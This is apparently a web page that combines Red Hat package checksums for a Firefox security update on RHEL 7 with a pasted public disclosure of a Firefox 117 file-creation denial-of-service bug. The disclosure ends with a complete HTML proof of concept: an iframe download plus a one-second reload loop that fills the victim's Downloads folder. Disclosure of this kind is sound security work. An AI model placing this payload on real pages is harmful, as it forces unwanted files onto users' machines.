firefox-debuginfo-102.15.0-1.el7\_9.x86\_64.rpm

SHA-256: e84178f0af08f12dfbf44a53471c477e9d2b3aa6f8626a0f49bd21509ba3c0fc

**Red Hat Enterprise Linux Desktop 7**

SRPM

firefox-102.15.0-1.el7\_9.src.rpm

SHA-256: 88cad1101c4409891f95fa58df3c7ce740f30b6a6c2160e0a6c13b618b8207dc

x86\_64

firefox-102.15.0-1.el7\_9.i686.rpm

SHA-256: 0e7fc47ecd4661f94cc0fe39a02795c1e8400b9b4713adaf62d4099894921540

firefox-102.15.0-1.el7\_9.x86\_64.rpm

SHA-256: ed9d320136a4c9ea7992ebe9fa335539a2523c2987fdbf7109121465a94eb6a5

firefox-debuginfo-102.15.0-1.el7\_9.i686.rpm

SHA-256: ed00c6e5b8207b1060596e4e84c74b80f95dadb6b3d6b0279e2dc6fb189ca532

firefox-debuginfo-102.15.0-1.el7\_9.x86\_64.rpm

SHA-256: e84178f0af08f12dfbf44a53471c477e9d2b3aa6f8626a0f49bd21509ba3c0fc

**Red Hat Enterprise Linux for IBM z Systems 7**

SRPM

firefox-102.15.0-1.el7\_9.src.rpm

SHA-256: 88cad1101c4409891f95fa58df3c7ce740f30b6a6c2160e0a6c13b618b8207dc

s390x

firefox-102.15.0-1.el7\_9.s390x.rpm

SHA-256: a5a4d28c59d22d539d1185595302fc17892c63121eb055b63811b327bb798eb9

firefox-debuginfo-102.15.0-1.el7\_9.s390x.rpm

SHA-256: 2f812b722321cf3decd7f02ceeda735b6c8157850a62deaae2b618252d00c375

**Red Hat Enterprise Linux for Power, big endian 7**

SRPM

firefox-102.15.0-1.el7\_9.src.rpm

SHA-256: 88cad1101c4409891f95fa58df3c7ce740f30b6a6c2160e0a6c13b618b8207dc

ppc64

firefox-102.15.0-1.el7\_9.ppc64.rpm

SHA-256: 2bcdb7186b0d7f035aaefd633c3b40bd0aecedf6deb2fc8bcdaf4260ce4326b6

firefox-debuginfo-102.15.0-1.el7\_9.ppc64.rpm

SHA-256: 85b314b3e31cb857618f81326f302afeac3818161f36459a7cddf84e5d23e9ed

**Red Hat Enterprise Linux for Power, little endian 7**

SRPM

firefox-102.15.0-1.el7\_9.src.rpm

SHA-256: 88cad1101c4409891f95fa58df3c7ce740f30b6a6c2160e0a6c13b618b8207dc

ppc64le

firefox-102.15.0-1.el7\_9.ppc64le.rpm

SHA-256: c790b246694f7269743f234b878f3cf28052017930a18ed40b80775589fcf771

firefox-debuginfo-102.15.0-1.el7\_9.ppc64le.rpm

SHA-256: 2ade4327589c9b8e6d4cf74ddc5643425db8a38c75910c24ceed45d50cd9d3cf

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:5019: Red Hat Security Advisory: firefox security update

Firefox version 117 suffers from a file creation denial of service vulnerability.

    This is barely a DoS, but since Chrome has explicit protectionagainst it, we decided to disclose it.If firefox user visits a specially crafted page, then firefoxmay create many files in `~/Downloads`,The user is notified about this in a small dialog, but there isno option to stop the downloads.The potential denial of service is that the user must manuallydelete the created files and this might be PITA.Technically about the PoC:  create non-empty file `xml.doc`.To force download, add to the page `iframe src="xml.doc"`.To force creation of new files, add `body onload="location.reload()"`(there are several other options about this).[Proof of concept][1]To out surprise, Chrome is safe from this and it distinguishesmanual download from automated download and this might be becauseit is aware about this DoS.Affected:  firefox 117 on GNU/Linux and reportedly on Windows.Not Affected:  firefox on android, Chrome, lynx.[1]: https://j.ludost.net/y3.html--- poc y3.html ---<html><body>Wait about 20 seconds andcheck for new files in ~/Downloads and also for message from firefox. Written by Georgi Guninski.<iframe src="xml.doc" width=10 height=10></iframe><script>setInterval(function () {location.reload()},1000);</script></body></html>--- poc y3.html ---

Tag

#firefox